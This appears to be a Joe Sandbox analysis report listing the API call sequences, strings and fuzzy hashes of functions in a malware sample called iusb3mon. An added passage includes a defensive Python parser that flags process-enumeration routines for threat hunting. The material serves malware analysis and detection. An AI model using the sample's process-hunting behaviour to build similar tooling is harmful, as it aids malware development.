                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Item
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 369458955-0
                                                                                                                    • Opcode ID: 46dd5a572ef41ea46c229e0713871712bf5d2f228b26225c04f2e03ef48550d1
                                                                                                                    • Instruction ID: d1ceaca273aedffd4aec79d51c5ec2c18769be84e3511db0e9fb6343390ed294
                                                                                                                    • Opcode Fuzzy Hash: 46dd5a572ef41ea46c229e0713871712bf5d2f228b26225c04f2e03ef48550d1
                                                                                                                    • Instruction Fuzzy Hash: 9E018F32821716BBAFB22F619C16EAE7B79EF44A50F034221FE1099014D771CA118AE1
                                                                                                                    APIs
                                                                                                                    • GetTopWindow.USER32(?), ref: 0625A7D7
                                                                                                                    • SendMessageA.USER32(00000000,?,?,?), ref: 0625A80D
                                                                                                                    • GetTopWindow.USER32(00000000), ref: 0625A81A
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0625A838
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1496643700-0
                                                                                                                    • Opcode ID: 80edc636b2e399a91e73eb0d0718ebbeaf0712bce73c5b26263023cfe7da2f6b
                                                                                                                    • Instruction ID: 250f33a221afd799a2a1ff52441b9ad16883f061bf7da6e61b5a7c83f8f58043
                                                                                                                    • Opcode Fuzzy Hash: 80edc636b2e399a91e73eb0d0718ebbeaf0712bce73c5b26263023cfe7da2f6b
                                                                                                                    • Instruction Fuzzy Hash: 1A01ED3242025AFBDFA25E91EC09EDF3A66EF45750F064111FE1055060C735C662EBA2
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Item$EnableFocusMenuNextParent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 988757621-0
                                                                                                                    • Opcode ID: b85d7ec1f906d8fb80029259a82e7d0faf02c31e6e8f66d68d10af1338b4aa02
                                                                                                                    • Instruction ID: 74e80f9646d3942fdc9868f45e681fbbb45ac261b4fa2da935067aab9d95ac11
                                                                                                                    • Opcode Fuzzy Hash: b85d7ec1f906d8fb80029259a82e7d0faf02c31e6e8f66d68d10af1338b4aa02
                                                                                                                    • Instruction Fuzzy Hash: 42115271920711AFDB7C9F60E858F6A77B5EF40712F124A1CFA96865E0C7B4E881CB50
                                                                                                                    APIs
                                                                                                                    • GetObjectA.GDI32(00000000,0000000C,?), ref: 0625AD96
                                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0625ADA2
                                                                                                                    • GetSysColor.USER32(00000008), ref: 0625ADB2
                                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 0625ADBC
                                                                                                                      • Part of subcall function 0625B81C: GetWindowLongA.USER32(00000000,000000F0), ref: 0625B82D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$LongObjectTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2871169696-0
                                                                                                                    • Opcode ID: b1b8fd0cfcb097f5574749e5fb2a2572f9b34c65bffbf3968b27213670b4f7bc
                                                                                                                    • Instruction ID: 4e255e03f71c0d189c4e7463225f1476015fe3bd49e304aa6ba62db01a9e1868
                                                                                                                    • Opcode Fuzzy Hash: b1b8fd0cfcb097f5574749e5fb2a2572f9b34c65bffbf3968b27213670b4f7bc
                                                                                                                    • Instruction Fuzzy Hash: 0F01313192120AEBDFB16F64EC5ABAE3B65EB00352F524611FE55D50E0CB70C994CF61
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(062788B8,00000001), ref: 06256617
                                                                                                                    • InitializeCriticalSection.KERNEL32(062788A0,?,?,?,0625495C), ref: 06256622
                                                                                                                    • EnterCriticalSection.KERNEL32(062788A0,?,?,?,0625495C), ref: 06256661
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterExchangeInitializeInterlocked
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3643093385-0
                                                                                                                    • Opcode ID: a1953239c22922074b498c0ba7720e14f9ef4bc4097bd4d6c7bbc027563f5769
                                                                                                                    • Instruction ID: 28ec449bcbd086119e706fad0372ad83b92987c3b957f46667cb0bccfbfe6963
                                                                                                                    • Opcode Fuzzy Hash: a1953239c22922074b498c0ba7720e14f9ef4bc4097bd4d6c7bbc027563f5769
                                                                                                                    • Instruction Fuzzy Hash: FDF0AF70B743069AE7F14A24BCCDE293EA6E7807E2B92003AFF41C1054D6BD84808F15
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,75918A60,06272BE8,06267FD0,06247609,06267FD0,?,?,?), ref: 06248D9B
                                                                                                                    • Process32First.KERNEL32(00000000,00000000), ref: 06248DB4
                                                                                                                    • Process32Next.KERNEL32(00000000,00000000), ref: 06248DD0
                                                                                                                    • lstrcmpiA.KERNEL32(00000024,06272BE8), ref: 06248DDE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CreateFirstNextSnapshotToolhelp32lstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2530627638-0
                                                                                                                    • Opcode ID: 9a549c2bfc5f1dcc75df7d6519a46bdde209e1d6053b0fecbe041c279cea9975
                                                                                                                    • Instruction ID: 34c8b211352066f95e0c101b2ba3cdff6b4cbe28f3a125c0c8d2e5db6f1de917
                                                                                                                    • Opcode Fuzzy Hash: 9a549c2bfc5f1dcc75df7d6519a46bdde209e1d6053b0fecbe041c279cea9975
                                                                                                                    • Instruction Fuzzy Hash: 7FF0B432236312ABE7F87A769C44E3B6AECEF95750F01085AFD59D6040DB24D4419265
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06241C0F
                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 06241C28
                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 06241C43
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?,00000002,00000000), ref: 06241C68
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 420147892-0
                                                                                                                    • Opcode ID: 73141b703bbb3f6f51f3f4201e6935f0cc765830ded2fde3c62102d71c20f999
                                                                                                                    • Instruction ID: 46ea11fc2d7120fb3bae0426b548e43fef18130fcf500c2a172d5f2dfe375d4f
                                                                                                                    • Opcode Fuzzy Hash: 73141b703bbb3f6f51f3f4201e6935f0cc765830ded2fde3c62102d71c20f999
                                                                                                                    • Instruction Fuzzy Hash: 91F096715112196BEBE0BBA5DC85EFAB3FCEB48354F0000B5ED44D2180DF74C9E58A21
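The two entries above are the kind a practitioner pivots on: each lists a function's API calls in order (here two Toolhelp32 process walks, one of which also compares the process name with lstrcmpiA, the shape of a "find a named process" routine), plus an Instruction Fuzzy Hash that lets the same function be located in other reports. As an added example, not part of the Joe Sandbox report, the Python below parses this entry format into records, flags process-walk functions, and collects the fuzzy hashes. The sample text is constructed from entries in this listing; the field labels it keys on ("APIs", "API ID", "String ID", "Instruction Fuzzy Hash") are the ones the report uses, and the helper names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import NamedTuple

# Constructed sample input: two entries copied from the report's function
# listing (leading whitespace trimmed, a few bookkeeping lines dropped).
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,75918A60,06272BE8,06267FD0,06247609,06267FD0,?,?,?), ref: 06248D9B
• Process32First.KERNEL32(00000000,00000000), ref: 06248DB4
• Process32Next.KERNEL32(00000000,00000000), ref: 06248DD0
• lstrcmpiA.KERNEL32(00000024,06272BE8), ref: 06248DDE
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Process32$CreateFirstNextSnapshotToolhelp32lstrcmpi
• String ID:
• API String ID: 2530627638-0
• Opcode ID: 9a549c2bfc5f1dcc75df7d6519a46bdde209e1d6053b0fecbe041c279cea9975
• Instruction Fuzzy Hash: 7FF0B432236312ABE7F87A769C44E3B6AECEF95750F01085AFD59D6040DB24D4419265
APIs
Strings
Similarity
• API ID: strlen
• String ID: Console$Groupfenzhu$Remarkbeizhu
• API String ID: 39653677-274741502
• Instruction Fuzzy Hash: 0CD02E32830310FBE794AA01FC0DFE73A99EB00760F184048BE192A0E0C6F348C0C7A2
"""

# "• Name.MODULE(args), ref: ADDR". The listing prefixes calls made from a
# callee with "Part of subcall function ADDR: " and omits the argument list
# for some CRT-internal calls (e.g. ___std_exception_copy), so both are accepted.
API_RE = re.compile(
    r"^• (?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
# "• Key: value" lines (API ID, String ID, Opcode ID, Source File, ...).
FIELD_RE = re.compile(r"^• (?P<key>[^:]+):\s?(?P<value>.*)$")


class ApiCall(NamedTuple):
    name: str
    module: str
    args: str
    ref: str
    caller: str  # address of the subcall function, "" for a direct call


@dataclass
class Entry:
    apis: list = field(default_factory=list)   # ApiCall in listing order
    fields: dict = field(default_factory=dict)  # key -> value


def parse_entries(text):
    """Split a function listing into entries; each one starts at an 'APIs' header."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section headers such as "Similarity" carry no data
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "",
                                    m["ref"], m["caller"] or ""))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["value"].strip()
    return entries


def api_sequence(entry):
    """Names of the function's own (non-subcall) calls, in listing order."""
    return [c.name for c in entry.apis if not c.caller]


def strings_of(entry):
    """'String ID' is '$'-joined; an empty value means no referenced strings."""
    return [s for s in entry.fields.get("String ID", "").split("$") if s]


def process_walks(entries):
    """(index, compares_names) for entries that walk the process list with
    Toolhelp32; compares_names is True when the same function calls lstrcmp*."""
    hits = []
    for i, e in enumerate(entries):
        names = set(api_sequence(e))
        if {"CreateToolhelp32Snapshot", "Process32Next"} <= names:
            hits.append((i, any(n.startswith("lstrcmp") for n in names)))
    return hits


def fuzzy_hashes(entries):
    """Instruction fuzzy hashes, the values to pivot on across reports."""
    return {e.fields["Instruction Fuzzy Hash"] for e in entries
            if "Instruction Fuzzy Hash" in e.fields}


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for i, compares in process_walks(ents):
        print(f"entry {i}: process walk, compares names={compares}: {api_sequence(ents[i])}")
    print("strings in entry 1:", strings_of(ents[1]))
```

Run against the full report text rather than the sample, `process_walks` returns every function that enumerates processes, and the `compares_names` flag separates a plain inventory walk (the second entry above, which only closes the snapshot handle) from one that is looking for a specific process name.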
                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0625B8E8
                                                                                                                    • GetWindowTextA.USER32(?,?,00000100), ref: 0625B904
                                                                                                                    • lstrcmpA.KERNEL32(?,?), ref: 0625B918
                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0625B928
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: TextWindow$lstrcmplstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 330964273-0
                                                                                                                    • Opcode ID: e628c4f34025ef4f341dae28f1f9460e3b5dc435d9382c405b50215996c8891a
                                                                                                                    • Instruction ID: 55643f72831abf19d1dfd09362ba817175b829d6bb80bb85d6cbe6ac8fc998e9
                                                                                                                    • Opcode Fuzzy Hash: e628c4f34025ef4f341dae28f1f9460e3b5dc435d9382c405b50215996c8891a
                                                                                                                    • Instruction Fuzzy Hash: F1F0F836800219ABDF326F24EC08AE9BB6EEB18391F01C061FD89D5110E770DA948F90
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: strlen
                                                                                                                    • String ID: Console$Groupfenzhu$Remarkbeizhu
                                                                                                                    • API String ID: 39653677-274741502
                                                                                                                    • Opcode ID: 7f11023de1ea7f05f38395fe05968f0f61170b3defc59bdc39a2812e07c32e23
                                                                                                                    • Instruction ID: 5788ae1c101e46df5d00c77714593618dabdf5f669072fe5c7fc868157b9c3ac
                                                                                                                    • Opcode Fuzzy Hash: 7f11023de1ea7f05f38395fe05968f0f61170b3defc59bdc39a2812e07c32e23
                                                                                                                    • Instruction Fuzzy Hash: 0CD02E32830310FBE794AA01FC0DFE73A99EB00760F184048BE192A0E0C6F348C0C7A2
                                                                                                                    APIs
                                                                                                                    • CloseServiceHandle.ADVAPI32(?,06247029), ref: 06247048
                                                                                                                    • CloseServiceHandle.ADVAPI32(?,06247029), ref: 0624705C
                                                                                                                    • RegCloseKey.ADVAPI32(?,06247029), ref: 06247070
                                                                                                                    • Sleep.KERNEL32(000001F4,06247029), ref: 0624707B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$HandleService$Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 994006413-0
                                                                                                                    • Opcode ID: 151b65bd1c557594d9ced68023362b1a1e2919a7b3070e79d1f5ddd187967375
                                                                                                                    • Instruction ID: 33f520aa4dac2aa96db4fa2cfb2622d0b4134e4cb2bb7030cde77a28cf57dd49
                                                                                                                    • Opcode Fuzzy Hash: 151b65bd1c557594d9ced68023362b1a1e2919a7b3070e79d1f5ddd187967375
                                                                                                                    • Instruction Fuzzy Hash: D2E07E3181132ADBDBBA7FA0EE4D69C7A76AB00702F4550FAE65D684608B311FC0DE10
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: bad Allocate$bad buffer
                                                                                                                    • API String ID: 3519838083-2913219628
                                                                                                                    • Opcode ID: 6d6abe68e42f18b9ffcb4c2e7d7f8abe6bf2086ebb4e61d59e6d7f8f743c39c1
                                                                                                                    • Instruction ID: ad51f5207f12a5c1297ae99053bfcf468255925cb7cffb08a04a20e33e8f3bee
                                                                                                                    • Opcode Fuzzy Hash: 6d6abe68e42f18b9ffcb4c2e7d7f8abe6bf2086ebb4e61d59e6d7f8f743c39c1
                                                                                                                    • Instruction Fuzzy Hash: 72517571E20209ABDFD8FFA5CC45ABEB7B9AF44604F108019ED15A6180DB749AA4CB91
                                                                                                                    APIs
                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 001D202F
                                                                                                                      • Part of subcall function 001D6F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,001D11FC,?,?,?,?,001D11FC,?,001FA814), ref: 001D6F94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                    • API String ID: 3109751735-1240500531
                                                                                                                    • Opcode ID: e5f250704090ab2f9187cce799ab6e99aa4168eea754158b24e574c3a095d3bb
                                                                                                                    • Instruction ID: 81f4b2afdfbeda0e07d87369634e18368ebcd80fde8a30e3a738b563faf4838e
                                                                                                                    • Opcode Fuzzy Hash: e5f250704090ab2f9187cce799ab6e99aa4168eea754158b24e574c3a095d3bb
                                                                                                                    • Instruction Fuzzy Hash: F751D7B1910608BBCB04DF58DC41AAEF7F8FF59710F14861AF914A7781E774A944CBA1
APIs
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Info
• String ID: $
• API String ID: 1807457897-3032137957
• Opcode ID: 2cc012d97424f53e1f01738e0336b2d610f4f7a18d33b82856de7e12d966bd77
• Instruction ID: 815b03c5e0980fa15e346972070721e978c439f4be1b7fe7caebe055135cf7b8
